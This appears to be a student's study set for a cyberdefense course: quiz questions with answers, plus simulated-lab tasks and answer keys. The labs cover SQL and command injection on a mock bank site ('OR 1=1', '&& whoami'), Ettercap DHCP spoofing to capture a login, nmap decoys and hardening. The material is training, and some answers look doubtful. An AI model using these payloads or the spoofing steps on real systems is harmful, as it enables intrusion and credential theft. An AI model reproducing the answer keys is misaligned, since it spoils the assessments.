CIT 484: CYBERDEFENSE PRO


You are the cybersecurity analyst for a small corporate network. You are exploring your online bank's web page to see how secure it is. In this lab, your task is to see if a SQL injection attack is possible on your online bank using the following information:
Bank's site: MySecureOnlineBank.com
Make an account query for account number 90639. Answer Question 1.
Look up the following account numbers and make note of the results of each search: 1, 12, 123, 1234, 12345, 123456. Answer Question 2.
Try your account number followed by the following additional information: 90639 bob, 90639 dog, 90639 cat. Answer Question 3.
Try a SQL injection attack using the following account numbers: any_5_digits OR 1=1 (OR is part of the value). Answer Question 4. any_5_digits && whoami. Answer Question 5.

1- 10,625.79 2- Five or more 3- The input is not restricted 4- 90006 5- www-user

Which of the following BEST describes adaptive hashes?

A function that feeds the hashed output back into the function a preset number of times.

Which of the following describes a credential stuffing attack?

A hacker tries a list of credentials on multiple sites.

Which of the following best describes a script kiddie?

A hacker who uses scripts written by much more talented individuals

The sender's name, company position, address, and phone number are commonly found in which of the following?

An email's signature block

Which of the following would the red team MOST likely use?

An ethical hacker

Which security control layer involves putting in place policies that comply with industry standards, such as OWASP?

Application

Which IoT security category does disabling guest or demo accounts fall under?

Authentication

Which of the following IoT security challenges can 2FA (two-factor authentication) help mitigate?

Authentication

Which of the following SQL injection attack types uses true/false questions to perform reconnaissance?

Blind injection attack

Which web application scanner looks for common vulnerabilities, like cross-site scripting and SQL injections, and also scans for the OWASP Top 10?

Burp Suite

A user has reported that they can't remote into the OpenSSH service running on their Windows 10 machine that they use to transfer files from a development Linux box. You are at the Windows machine and have Task Manager running. You notice that the SSHD, the OpenSSH server process, is not in the list on the Processes tab of Task Manager. Which tab on the screenshot below would you click on, and which steps could you take to start the service and ensure it starts every time the machine is booted?

Click on the Services tab and then click Open Services at the bottom. Then find the OpenSSH SSH Server entry, double-click on it, and click the Start button. Change the Startup Type field to Automatic.

Which of the following attacks targets the managed service provider itself?

Cloud hopper

What should be the FIRST reconnaissance countermeasure taken?

Create information sharing policies.

Which of the following IoT attacks involves using IoT devices as a zombie army to target a server or system?

DDoS attack

Which of the following firewall evasion techniques is used to redirect a user to a malicious website?

DNS poisoning

What is vandalism?

Damaging or defacing assets

Which of the following permissions would take precedence over the others?

Deny Read

Which government agency sponsors five valuable resources for security analysts?

Department of Homeland Security

Which of the following attack types overflows the server, causing it to not function properly?

DoS

Which of the following certification types has the lowest level of certificate assurance?

Domain

You are the security analyst for a small corporate network. Recently, several of your computers were infected by a Trickbot virus. It appears they got the virus from a spreadsheet. Various versions of spreadsheets had different requests for the virus files from different servers. You are using Security Onion Hunter to analyze the attack. In this lab, your task is to:
Log in to Security Onion and access Hunt. Security Onion server: 192.168.0.101; Email address: [email protected]; Password: password
From Hunt: Examine the ET INFO Dotted Quad Host DLL Request alert event. Answer Questions 1 and 2. Examine the ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 alert event. Answer Questions 3 and 4.

1- update.dll 2- The server is requested using a raw IP address instead of a hostname. 3- Suricata 4- 694272

You are the security analyst for a small corporate network. To better recognize and defend against DHCP man-in-the-middle (on-path) attacks, you have decided to create and analyze this type of attack using the Ettercap tool. In this lab, your task is to complete the following:
On IT-Laptop, use Ettercap to launch a man-in-the-middle (MITM) DHCP spoofing attack using the following parameters: Netmask: 255.255.255.0; DNS Server IP: 192.168.0.11. View the IP address. Answer Question 1.
On Support, complete the following tasks: Using Wireshark and the enp2s0 interface, start a capture and filter the display, showing only DHCP traffic. From the Terminal, view the default gateway addresses. Answer Question 2. Bring the network interface down and back up to request new DHCP addresses. View the gateway again to see if anything changed. Answer Question 3. In Wireshark, analyze the DHCP ACK packets captured to find the router IP addresses used. Answer Question 4.
On Office1, analyze the effects of the man-in-the-middle attack by completing the following tasks: View the default gateway. Answer Question 5. Use tracert to find the path to rmksupplies.com. Answer Question 6. Release and renew the IP addresses assigned by DHCP. Check the default gateway of the computer again. What has changed? Answer Question 7. Use tracert to find the path to rmksupplies.com. Has anything changed? Answer Question 8. Log into the rmksupplies.com employee portal with the following credentials: Username: bpascal (Blaise Pascal); Password: Dontrygu3ss1ng
On IT-Laptop, find the captured username and password in Ettercap.

1. On IT-Laptop, start unified sniffing on the enp2s0 interface.
a. From the Favorites bar, select Ettercap.
b. Select Sniff > Unified sniffing.
c. From the Network Interface drop-down list, select enp2s0.
d. Select OK.
e. Select Mitm > DHCP spoofing.
f. In the Netmask field, enter 255.255.255.0
g. In the DNS Server IP field, enter 192.168.0.11
h. Select OK.
2. View the IP address of the IT-Laptop computer.
a. From the Favorites bar, select Terminal.
b. At the prompt, type ip addr show and press Enter.
c. In the top right, select Answer Questions.
d. Answer Question 1.
e. Close the Lab Questions dialog.
3. On Support, start a Wireshark capture on the enp2s0 interface and filter for only DHCP packets.
a. From the top navigation tabs, select Floor 1 Overview.
b. Under Support Office, select Support.
c. From the Favorites bar, select Wireshark.
d. Under Capture, select enp2s0.
e. Select the blue fin to begin a Wireshark capture.
f. In the Apply a display filter field, type bootp and press Enter to show only DHCP packets. Notice that no packets are being captured.
4. View the default gateway for Support.
a. From the Favorites bar, select Terminal.
b. Type route and press Enter.
c. In the top right, select Answer Questions.
d. Answer Question 2.
5. Request new DHCP addresses for the enp2s0 interface.
a. From the terminal, type ip link set enp2s0 down and press Enter to bring the interface down.
b. Type ip link set enp2s0 up and press Enter to bring the interface back up. Notice that DHCP packets (bootp) have been captured.
6. View the current default gateway on Support.
a. In Terminal at the prompt, type route and press Enter.
b. Close the Lab Questions dialog.
7. In Office1, view the current default gateway and the route to the rmksupplies.com site.
a. From the top navigation tabs, select Floor 1 Overview.
b. Under Office 1, select Office1.
c. Right-click Start and select Windows PowerShell (Admin).
d. Type ipconfig and press Enter.
e. In the top right, select Answer Questions.
f. Answer Question 5.
g. Type tracert rmksupplies.com and press Enter.
h. Answer Question 6. Note that the first hop and default gateway were determined prior to the MITM attack.
8. View the effects of the MITM attack on Office1's IP addresses.
a. At the prompt, type ipconfig /release and press Enter to release the currently assigned addresses.
b. Type cls and press Enter to clear the screen.
c. Type ipconfig /renew and press Enter to request new IP addresses from the
d. Type tracert rmksupplies.com and press Enter.
9. From Google Chrome, log into the rmksupplies.com Employee Portal.
a. From the taskbar, select Google Chrome.
b. Maximize the window for easier viewing.
c. In the URL field, enter rmksupplies.com and press Enter.
d. At the bottom of the page, select Employee Portal.
e. In the Username field, enter bpascal.
f. In the Password field, enter Dontrygu3ss1ng.
g. Select Login. You are logged in as Blaise Pascal.
10. From IT-Laptop, find the captured username and password in Ettercap.
a. From the top navigation tabs, select Floor 1 Overview.
b. Under IT Administration, select IT-Laptop.
c. Maximize Ettercap.
d. In Ettercap's bottom pane, find the username and password used to log into the Employee Portal.
11. Answer the questions.
a. In the top right, select Answer Questions to end the lab.
b. Select Score Lab.
1- 192.168.0.46 2- 192.168.0.5 3- 192.168.0.46 4- 192.168.0.5, 192.168.0.46 5- 192.168.0.5 6- 192.168.0.5 7- 192.168.0.46 8- 192.168.0.46

Which of the following is a SIEM collection tool that's used to search and analyze large collections of data in multiple formats?

Splunk

Costs that are easily identifiable and quantifiable, such as damaged hardware, stolen passwords, and lost or corrupted data, are considered which type of impact?

Tangible

Which of the following frame (packet) subtrees would you expand in order to view the POST data that was captured by Wireshark?

The HTML Form URL Encoded: subtree would have the POST data.

You created a honeypot server using Pentbox. After a while, you go back to the honeypot server to see what it has been capturing. Which of the following can be gleaned from the results shown?

The operating system used by the attacker

A Windows web server that was reported as being compromised has been scanned, patched, and appears to be running properly with no indications that it is still compromised. The server is back in production, but users are complaining that they receive certificate errors when connecting to it. You did not perform the quarantine on the machine (a coworker did). They also performed the patching and scanning before putting it back to work in production. What might be causing the certificate errors?

The server certificate was revoked since the private key may have been compromised.

What does the HTTP response message 5xx indicate?

The server did not complete the request.

What is the main purpose of SOAR?

To replace tasks that are repetitive and done manually with automated workflows

What information can an organization obtain as part of a SCAP security scan?

Whether or not their systems are configured for optimal security.

An attacker needs the following information about his target: domain ownership, domain names, IP addresses, and server types. Which tool is BEST matched for this operation?

Whois

You are working for a company that has one domain and multiple subdomains. Which certificate type would you need?

Wildcard

Which wireless component functions as a bridge between a wired and wireless network?

Wireless access point

When performing active reconnaissance, a malicious actor may try to do which of the following?

Work at peak hours to blend in

Which of the following BEST describes the role of a remediation server?

Works to bring devices up to a minimum security level.

Which of the following Linux permissions allows files to be added or deleted from a directory?

Write

A security analyst is working to discover zero-day attacks before the system is compromised. What is one method for discovering these types of attacks that the security analyst should try?

Write rules in a program like YARA that recognizes similar patterns of code found in other malware and flags them if they interact with the system.

Which of the following attacks exploits vulnerabilities in the web application and allows the attacker to compromise a user's interactions with the app?

XSS

Which type of scan turns on an abundance of flags, causing the packet to be lit up?

Xmas tree scan

Threats that do not have an existing fix, do not have any security fixes, and do not have available patches are called what?

Zero-day threats

Cisco devices have a special interface called _____, which is designed to act as a blackhole.

null0

You are tasked with enumerating an exploited machine using Metasploit. The target system is already connected to the Metasploit console, and you have executed the help command to see which options are available. Which of the listed commands will give you the computer name, operating system, and hardware architecture?

sysinfo

Which Linux command can be used to provide a table of each running process?

top

Which software facilitates communication between different virtual machines by checking data packets before moving them to a destination?

vSwitch

After having calculated the MD5 hash for a file, you need to compare it to the value provided by the vendor. You could examine each character to ensure it is correct, but PowerShell has a utility for comparing the strings. Which of the following would be an example of that command?

"2b8efe1bee907243f22c16e14032a5ea" -eq "2b8efe1bee907243f22c16e14032a5ea"

Fred runs a small manufacturing shop. He produces consumer goods on his equipment. Suppose Fred has six stamp presses each valued at $35,000. At any given time, two of his presses might be out of service due to mechanical breakdowns or required upgrades. What is Fred's single loss expectancy?

$70,000

Fill in the missing piece of the command: Nmap has the ability to generate decoys that make the detection of the actual scanning system become much more difficult. The nmap command to generate decoys is nmap ____ RND:10 target_IP_address

-D

Which file on a Linux system can be enumerated to display all known users?

/etc/passwd

As the security analyst for your company, you are performing a test to verify email security. You are specifically concerned that the HR department may be sending employees' personally identifiable information (PII) in cleartext through emails. In this lab, your task is to:
Capture packets on the enp2s0 interface using Wireshark.
Find packets containing the following information using display filters: Social security numbers (SSNs); Birth dates; Direct deposit routing numbers; Mothers' maiden names.

1- 212-09-3158 2- Williamson 3- 3 4- 123456781

You are the security analyst for a small corporate network. Recently, several of your computers were infected by a Trickbot virus. It appears they got the virus from a spreadsheet. Various versions of spreadsheets had different requests for the virus files from different servers. You are using Security Onion Hunter to analyze the attack. In this lab, your task is to:
Log in to Security Onion and access Hunt. Security Onion server: 192.168.0.101; Email address: [email protected]; Password: password
From Hunt: Examine the ET MALWARE Win32/Trickbot Data Exfiltration alert event. Answer Questions 1 and 2. Expand and examine the ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2 alert event. Answer Questions 3 and 4. Examine the ET USER_AGENTS Suspicious User-Agent (contains loader) alert event. Answer Question 5. Examine the ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response alert event. Answer Question 6.

1- Cambodia 2- 00-08-02-1C-47-AE 3- It is not a standard HTTP port. 4- 8015558861 5- imgpaper.png 6- 446515

You are a security analyst and have been testing Burp Suite with your online bank. You have already configured Google Chrome to use Burp Suite as a proxy server, allowing all web traffic to pass through Burp Suite. In this lab, your task is to explore Burp Suite Repeater:
Open Burp Suite and turn off Intercept.
Look up your account balance on mysecureonlinebank.com using the following information: Use Google Chrome. Bank URL: mysecureonlinebank.com; Account number: 90342
From Burp Suite, explore the Repeater using mysecureonlinebank.com as follows: Send the GET entry containing an account number to the Repeater. In Repeater, alter the account number to 90639 and then resend the page. Answer Question 1.
Use the Repeater to perform a simple injection attack using the following information: Alter the account number to 90639 OR 1=1 and then resend the page. Answer Question 2. Alter the account number to 90639 && whoami and then resend the page. Answer Question 3.

1- Olivia Martinez 2- 90005 3- www-login

You are a security analyst and have been testing Burp Suite with your online bank. You have already configured Google Chrome to use Burp Suite as a proxy server, allowing all web traffic to pass through Burp Suite. In this lab, your task is to use Burp Suite to fuzz test for SQL injections as follows:
Open Burp Suite and turn off Intercept.
Look up your account balance on mysecureonlinebank.com using the following information: Use Google Chrome. Bank URL: mysecureonlinebank.com; Account number: 90342
Launch a simple payload attack against the mysecureonlinebank.com site using the following information: Send the GET entry containing an account number to Intruder. In Intruder, select the account number (90342) as the position for the attack payload. Examine the Payload Options [Simple List] already selected on the Payloads page. Launch the attack.
Analyze the results of the payload attack. As the attack progresses, click on several lines and examine the results. The response length field will give you clues as to which type of response was received.
Answer the questions.

1- SQL Syntax Error 2- Bad Request 3- 21

You are the security analyst for a small corporate network. Several employees have received strange invoice-related emails from the account manager that ask for information he should already know. You suspect that someone is impersonating the account manager's email account by spoofing his email address. You have decided to run a test to see if this is true. In this lab, your task is to:
Capture packets on the enp2s0 interface using Wireshark.
Use display filters to find packets containing invoice emails.
View the email header and determine if the manager's email address has been spoofed. The manager's information is: Name: Robert Jenson; Email: [email protected]
Answer the questions.

1- emkei.cz 2- fail 3- yes

You are the security analyst working for CorpNet. Your company wants to protect against any potential weakness in their public-facing servers. They would like to make sure that all of their servers are running up-to-date web server software, and they don't want to expose the servers to threats by using outdated security protocols or easily exploitable ports.
Computer Name   IP Address    Domain Name
CorpNet_www     198.28.1.1    www.corpnet.xyz
CorpNet_www2    198.28.1.2    www2.corpnet.xyz
CorpNet_www3    198.28.1.3    www3.corpnet.xyz
www_stage       198.28.1.15   www_stage.corpnet.xyz
In this lab, your task is to scan the public-facing web servers as follows:
Run the curl --head command against each server.
Using nmap, run the ssl-enum-ciphers.nse script against the secure web server port on each server.
Answer the questions.

1- www3.corpnet.xyz (198.28.1.3) 2- www.corpnet.xyz (198.28.1.1) www_stage.corpnet.xyz (198.28.1.15) 3- www_stage.corpnet.xyz (198.28.1.15)

You are the security analyst for a small corporate network. You believe a hacker has penetrated your network and is using ARP poisoning to infiltrate it. In this lab, your task is to discover whether ARP poisoning is taking place as follows: Use Wireshark to capture packets on the enp2s0 interface for five seconds. Analyze the Wireshark packets to determine whether ARP poisoning is taking place. Use the 192.168.0.2 IP address to help make your determination. Answer the questions.

1- 00:00:1B:11:22:33 2- 00:00:1B:33:22:11

You are the security analyst for a small corporate network. While conducting some tests to see if your network can be hacked, you have discovered that you can obtain a copy of the zone information from the CorpDC3 server. This server is a domain controller in the CorpNet.local domain and holds an Active Directory-integrated zone for the CorpNet.local domain. To better protect the company zone data, you have decided to prevent zone transfers. In this lab, your task is to disable zone transfers for the CorpNet.local zone.

1. Access the CorpNet.local properties settings.
a. From Server Manager, select Tools > DNS.
b. From the left pane, expand CORPDC3 > Forward Lookup Zones.
c. Right-click CorpNet.local and then select Properties.
2. Disable zone transfers.
a. Select the Zone Transfers tab.
b. Clear Allow zone transfers.
c. Select OK.

You are the security analyst for a small corporate network. You are attempting to improve the password security of the Windows 10 laptop located in the Lobby. In each policy, the Explain tab provides a description of the policy's effects to help you identify the policies and values to configure. In this lab, your task is to use the Local Security Policy tool to configure password restrictions as follows:
New passwords cannot be the same as the previous 4 passwords.
Passwords must be changed every 30 days.
New passwords cannot be changed for at least 2 days.
Passwords must be at least 10 characters long.
Passwords must contain non-alphabetical characters.
Automatically unlock locked accounts after 1 hour.
Lock the user account after four incorrect logon attempts within a 40-minute period.

1. Access the Local Security Policy.
a. Select Start > Windows Administrative Tools.
b. Select Local Security Policy.
c. Maximize the window for easier viewing.
2. Configure the password policies.
a. From the left pane, expand and select Account Policies > Password Policy.
b. Double-click the policy you want to configure.
c. Configure the policy settings.
d. Select OK.
e. Repeat steps 2b-2d to configure additional policies.
3. Configure the account lockout policies.
a. From the left pane, select Account Lockout Policy.
b. Double-click the policy you want to configure.
c. Configure the policy settings.
d. Select OK.

You are the security analyst for a small corporate network. To defend against non-authorized applications being installed on the systems in your company, you have decided to implement Microsoft's Windows Defender Application Control (WDAC). You have already created a golden system containing all of the desired applications. In this lab, your task is to complete the following:
From Office2 (the golden system), create an XML file that will be used to create the initial code integrity policy (CIPolicy). When running the command: Use the -Level Pca and -UserPEs flags. Scan the entire C:\ drive.
Convert the XML file to a binary file named AppCIP.bin. Save the converted file in the CorpDC\WDAC share. The C:\WDAC folder on CorpDC is shared as WDAC.
From CorpDC (a VM running on CorpServer), create and implement a Group Policy Object (GPO) to implement the above policy company-wide. GPO information: On CorpDC in the CorpNet.local domain, create a GPO named App-WDAC. For Device Guard, enable and configure the Deploy Windows Defender Application Control setting to use the code integrity policy file you saved.

1. From Office2, create an XML file that will be used to create the initial code integrity policy (CIPolicy).
a. Right-click Start and then select Windows PowerShell (Admin).
b. From PowerShell, run New-CIPolicy AppCIP.xml -Level Pca -ScanPath C:\ -UserPEs
c. Wait for the scan to complete.
2. Convert the XML file to a binary file and save it on CorpDC in the WDAC share.
a. From PowerShell, run ConvertFrom-CIPolicy AppCIP.xml C:\AppCIP.bin
b. From the Windows taskbar, select File Explorer.
c. From the left pane, expand and select This PC > System (C:).
d. Right-click AppCIP.bin and then select Copy.
e. From the left pane, expand and select Network > CorpDC > WDAC.
f. In the right pane, right-click and select Paste.
3. Switch to CorpServer and connect to the Hyper-V CorpDC server.
a. From the top navigation area, select Floor 1 Overview.
b. Under Networking Closet, select CorpServer.
c. From the Hyper-V Manager, select CORPSERVER.
d. From the Virtual Machines pane, double-click CorpDC.
4. Create the WDAC GPO in the CorpNet.local domain.
a. From Server Manager's menu bar, select Tools > Group Policy Management.
b. Maximize the window for better viewing.
c. Expand Forest: CorpNet.local > Domains.
d. Right-click CorpNet.local and select Create a GPO in this domain, and link it here.
e. In the Name field, use App-WDAC and then select OK.
5. Enable and configure the Deploy Windows Defender Application Control policy to distribute the AppCIP initial code integrity policy.
a. Expand CorpNet.local and then right-click App-WDAC and select Edit.
b. Maximize the window for better viewing.
c. From the left pane, expand and select Computer Configuration > Policies > Administrative Templates > System > Device Guard.
d. From the right pane, double-click Deploy Windows Defender Application Control.
e. Select Enabled.
f. In the Code Integrity Policy file path field, enter C:\WDAC\AppCIP.bin. The WDAC network share on CorpDC is the local folder C:\WDAC.
g. Select OK.

Jason, an attacker, has manipulated a client's connection to disconnect the real client and allow the server to think that he is the authenticated user. Which of the following describes what Jason has done?

Active hijacking

Charles, a security analyst, needs to check his network for vulnerabilities. He wants a scan that interacts with network nodes and repairs security issues found. Which kind of scanning BEST describes Charles' requirements?

Active scanning

Which type of wireless network does not use a wireless access point?

Ad-hoc

Which of the following two methods can be used to refine the number of alerts displayed in Kibana based on search rules? (Select two.)

Add a filter in the Search field. Click a ring on the Security Onion - Data Overview graph.

On rare occasions, an individual computer contains information that is highly confidential and must remain separated from both internal and external networks. Which of the following segmentation solutions would BEST achieve this goal?

Air gap

You have just used OWASP ZAP to run a vulnerability scan on your company's site. From the Information window, select the tab that lets you view the vulnerabilities found.

Alerts

Which of the following is the client responsible for in a PaaS cloud service model?

All applications developed

You are the security administrator for your organization. You need to provide Mary with the needed access to make changes to the finances.xlsx file located in the Accounting directory. Which of the following permissions should you set for Mary?

Allow Write permission on the finances.xlsx file.

While looking at your Security Onion appliance, you noticed that there was a significant increase in after-hours traffic on your network when all workstations were powered off and nobody else was in the office. Some of this traffic generated alerts in Kibana. Also, your web server was very slow to respond when you checked the website. With the information in the graph below, what might be the cause? (Select two.)

An ICMP flood attack
A DDoS attack

A user of your website has posted a message for others to view. After several employees complain of strange behavior on their browser after visiting the site, you investigate and find some text: There is more than just what is displayed, contained between the What kind of attack is this?

An XSS vulnerability attack.

Which of the following BEST describes a DoS fragmentation attack?

An attack in which fake UDP or ICMP packets larger than the MTU are sent to exhaust the processing resources.

Why should DNS zone transfers be restricted or disabled?

An attacker can intercept the transfer and change information.

Which of the following BEST describes a TCP session hijacking attack?

An attacker sniffs between two machines on a connection-based protocol, monitors the traffic to capture the session ID, terminates the target computer's connection, and injects packets to the server.

Which of the following BEST describes horizontal escalation?

An attacker trying to access a user on the same system.

Which of the following BEST describes a high-value asset?

An offline asset that halts production.

Which of the following BEST describes Retina CS for Mobile?

Analyzes and reports findings from a centralized data warehouse.

One component of the ALE calculation is ARO. What does ARO represent?

Annualized rate of occurrence

You have performed a SQL injection attack against a website using Burp Suite and see the following results. What are you looking for?

Any results that show something unexpected being passed back from the server

Which of the following web server technologies does Linux typically use?

Apache

At which layer is a web application firewall log used to record HTTP traffic?

Application

A company is considering the purchase of a new application. During the evaluation period, a security analyst wants to make sure that all areas of the app are secure, especially input controls. Which assessment BEST meets these requirements?

Application-level assessment

John's company just purchased a new application for which they do not have the source code. Which of the following BEST describes the type of assessment John should use on this application?

Application-level assessment

You have collected files that contain evidence of a cyber crime committed against your company. You are required to share each file with legal teams, law enforcement, and the CEO of your company. Which of the following is the first thing to do to ensure that the files are not tampered with and everyone gets the exact same information in the files?

Apply a CHF to each file.

Attackers have used a brute force attack to crack CHF hashes in your network. What could you do to better protect the original strings?

Apply adaptive hashing.

Which of the following are true regarding parameterized queries? (Select two.)

Are pre-compiled SQL statements
Help prevent SQL injection attacks

Which of the following types of devices use sensors to gather data and send that data back to specialized controllers to make decisions and changes in the systems?

Automated systems

The third step in vulnerability management is to see what an organization looks like from an outsider's and insider's point of view. Which step in life cycle management does this apply to?

Baseline creation

You have just installed Nessus for auditing a network segment. Which of the following Nessus scans would be BEST suited for an initial query of hosts on a network segment?

Basic Network Scan

You are configuring a new email server for your organization and need to implement a firewall solution. The firewall will be designed to handle connections to the email server. Which of the following would be the BEST firewall solution?

Bastion host

Which of the following could you use as an LDAP countermeasure?

Block port 389.

Which of the following attacks sends unwanted messages to Bluetooth devices?

Bluejacking

Which of the following Kali Linux utilities can be used to find Bluetooth devices? (Select two.)

Bluelog
Blueranger

Which of the following is a utility that hackers can use to locate vulnerable Bluetooth devices?

Bluesniff

Which method is used to verify that a connected device is trusted?

Bus encryption

How is probability determined using qualitative analysis?

By a team of subject matter experts

Which of the following is an entity that issues digital certificates?

CA

Which of the following is a dictionary of known patterns of cyberattacks used by hackers?

CAPEC

Which of the following tools is best for ensuring that users have access to only the applications and resources they need in a private cloud?

CASB

Which vulnerability scoring system uses metrics called base, temporal, and environmental?

CVSS calculator

Mary is using her laptop at the local coffee shop. Before being allowed to their wireless internet, she was prompted to agree to the terms and conditions of using the network. Which wireless access method is the coffee shop using?

Captive portal

BitLocker is being deployed to all Windows machines on your network. A new machine has been installed with the latest Windows 10 software and needs to have its drive encrypted. When you start to encrypt, you see the following error. You know that this machine has a TPM because your own workstation is the same model. What should you do?

Check the BIOS to ensure that the TPM is enabled and activated.

You are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You want to ensure that it includes the anti-malware IDS/IPS rule set that enables users with cost constraints to enhance their existing network-based malware detection. Select the option that would add these rule sets.

Click to enable download of Emerging Threats Open rules

Which web application architecture layer includes the physical devices that are used to access the web application?

Client/Presentation

A security analyst must identify risks and figure out how best to mitigate them. Which of the following are risk mitigation techniques? (Select three.)

Close unused ports on a firewall. Train users to identify email attacks. Ensure systems are patched and updated.

When you create an event subscription, events are sent from one computer to another. What is the computer that receives the events called?

Collector computer

Which of the following configurations can be used with Windows Event Forwarding? (Select two.)

Collector-initiated subscriptions Source-initiated subscriptions

Which of the following is a type of malware that can be purchased in a ready-to-use state, is created to be used with a variety of targets, can be integrated with other malware programs, and can be implemented in stages?

Commodity malware

Which resource can BEST be described as a site that combines diverse ideas and perspectives from professionals, academics, and government sources?

Common Weakness Enumeration

Which cloud deployment model would MOST likely be used by several organizations that share the same regulatory requirements?

Community cloud

As you're investigating an incident for your company, you discover that a crash on the suspect's computer occurred and created a snapshot of everything that was in physical memory at the time of the crash. Which type of memory dump is this?

Complete memory dump

Creating a baseline is vital to managing vulnerabilities. What is the FIRST step in creating this baseline?

Conduct a pre-assessment

You are a cybersecurity consultant and have been asked to work with rmksupplies.com to ensure their network is protected from hackers. You are evaluating the security of their website using Burp Suite. You have already configured Google Chrome to use Burp Suite as a proxy server so that all web traffic passes through Burp Suite. In this lab, your task is to use Burp Suite to evaluate website logins as follows: Open Burp Suite and turn Intercept off. Monitor the HTTP History tab while logging in to the rmksupplies.com Employee Portal. Username: sramirez Password: mickeyminniegoofypluto Examine the POST entry in HTTP History to discover if this website is vulnerable to attack. Answer the question.

Configure HTTPS on the rmksupplies.com web server

An employee has been dismissed from the company and is suspected of gathering sensitive customer data before their termination. The legal team has asked you to perform a forensic examination of their workstation hard drive. Before you begin examining the contents of the device, what should you do?

Connect a write blocker to prevent changes being accidentally made to the device.

Which of the following technologies is a hypervisor substitute that separates resources at the operating system level?

Containerization

During which phase of the incident response life cycle do you isolate affected systems and restrict communication to only trusted individuals?

Containment

You have decided to configure an ARP cache poisoning on-path (man-in-the-middle) attack to test a new computer on your network to verify that it connects to required company resources securely. After defining the target hosts in Ettercap and capturing data during several login attempts, you see the following. What should your next step be in checking for a cookie hijacking attack?

Copy the user_token field value and use a cookie copy tool, such as the Google Chrome Copy Cookies extension, to attempt to access the same resource found at the URL listed.

John the Ripper is a popular tool that helps attackers. Which of the following is its main function?

Crack passwords

You are configuring a pfSense appliance to support a new guest Wi-Fi network, which will be used by potentially hundreds of customers per day. This new network will connect to the internet through your corporate network, although many switches and firewalls are in place to help with security. You are using a pfSense appliance to serve up the terms and conditions for users to agree to. What might be the BEST option for keeping your corporate network secure?

Create a VLAN for the new Wi-Fi network.

The following output was displayed using the Social Engineering Toolkit (SET). Which attack method was used to capture the user's input?

Credential harvesting attack method

John creates an account and creates a listing for the sale of his home. He uses HTML tags to bold important words. Chris, an attacker, spots John's listing and notices the bolded words. Chris assumes HTML tags are enabled on the user end and uses this vulnerability to insert his own script, which will send him a copy of the cookie information for any user who looks at the ad. Which type of attack method is Chris most likely using?

Cross-site scripting

What is the name of the sanitization method that involves destruction of an encryption key to render a drive's data useless?

Cryptographic erase

There is a feature that has the following characteristics: Is deterministic. Can quickly compute the fixed-sized bit array for any given input. Creates a unique fixed-sized bit array for each input. Creates a new array if any modification occurs to the original input. These characteristics BEST describe which of the following?

Cryptographic hash function

An impact analysis evaluates the cost of an attack. Which of the following would be considered a non-financial cost?

Customer satisfaction Reputation

In 2016, an attacker used a botnet of security cameras, DVRs, and network printers to target a cloud-based internet performance management organization that provided DNS services to large corporations. This created connectivity issues for legitimate users across the United States and Europe. Which type of attack was MOST likely used in this scenario?

DDoS attack

You train your staff to notify you if they notice any of the following signs: Services are unavailable or very slow Unexpected 503 error messages Abnormal spikes in network traffic Customer complaints about access Which type of attack are you preparing against?

DDoS attack

Which of the following is an email authentication tool that relies on an email's encrypted digital signature to verify its authenticity?

DKIM

Which of the following tools allows domain owners to notify receivers that emails have been authenticated, provides feedback about the legitimacy of emails sent on their domain, and applies instructions for emails that failed authentication?

DMARC

During the reconnaissance phase, an attacker is looking for common attack vectors. Which of the following services is MOST likely to be targeted?

DNS

Which of the following should be implemented as protection against malware attacks?

DNS sinkhole

Which of the following would an external assessment check?

DNS zones

You are looking for a wipe utility to erase deleted files without affecting any other files. Which utilities could you use? (Select two.)

DP Shredder Cipher

The economic impact of an incident can be tangible or intangible. Which of the following costs would be considered intangible? (Select two.)

Damage to reputation Loss of potential customers

Where can you find a quick overview of your monitored system's current state?

Dashboard

Large data transfers to unusual devices could be a sign of which Indicator of Compromise (IOC)?

Data exfiltration

Which type of breach happens when an attacker removes or transfers data from your system to another?

Data exfiltration

You have observed that Steve, an employee at your company, has been coming in at odd hours, requesting sensitive data that is unrelated to his position, and bringing in his own flash drive. Steve's actions are common indicators of which of the following threats?

Data loss

Which of the following is the process of obfuscating data by changing it into random characters?

Data masking

A suspicious program is run in a controlled environment, where a security analyst monitors the program's execution to track the effect it has on computer resources, like its operating system. The analyst can set breakpoints or pause the program for reports on memory content, storage devices, or CPU registers. Which reverse engineering tool is the analyst using?

Debugger

Which of the following firewall evasion countermeasures should be implemented to mitigate firewall evasion? (Select two.)

Defense in Depth Filtering an intruder's IP address

As a security analyst working for an accounting firm, you need to evaluate the current environment. Which of the following is the FIRST thing you should do?

Define the effectiveness of the current security policies and procedures.

You are the security analyst for a small corporate network. Recently, your network became extremely slow. You have decided to use Security Onion to see if you can determine the cause. In this lab, your task is to: Log in to Security Onion and access Kibana.Email address: [email protected]: password From Kibana, examine the Discover and Dashboard pages for possible issues. Answer the questions.

Denial-of-service attack

Mary, a security analyst, is tasked with vulnerability research as part of her company's vulnerability assessment. She discovered that their website is vulnerable to cross-site scripting. Which vulnerability type BEST describes what Mary has found?

Design flaw

Which of the following are characteristics of embedded systems?

Designed to perform a single function Sealed system Handle processes in a deterministic manner

During which phase of the incident response life cycle do you identify an attack or an incident after it has begun?

Detection and analysis

Which type of security control identifies, logs, and reports incidents as they happen?

Detective

Which security control makes a system more difficult to attack?

Deterrent

Which IoT communication model would MOST likely be used by a thermostat?

Device-to-device model

Which of the following is the science of gathering and analyzing digital data in relation to a computer crime or cyber attack?

Digital forensics

Which of the following attacks would use the following syntax? http://www.testout.com.br/../../../../ some_dir/ some_file

Directory traversal

Before signing an agreement with a new vendor, which type of assessment should you complete?

Due diligence

Which of the following are best practices to secure mobile devices for users?

Encrypt the device storage. Set up remote wipe. Don't auto-upload photos to social media.

While investigating a potential security breach on a Windows machine, you list the commands that have recently been executed from the command line and find the following: arp -a, set username, set computername, net localgroup administrators, and tasklist. There are other commands as well. While then checking the running processes, you see the output below in Task Manager. It's clear that someone has compromised the Windows machine. What would you call the phase of the attack that you have found?

Enumeration

An attacker wants to use a SQL injection attack against your web application. Which of the following can provide useful information to the attacker about your application's SQL vulnerabilities?

Error messages

Which of the following is a trust relationship that exists between different organizations or applications?

Federation

As you're investigating a cyber crime in your organization, you suspect that important files have been deleted. Which of the following techniques can you use to bypass the file system and recover files based only on their structure by scanning raw bytes of disk data in order to reassemble them for examination?

File carving

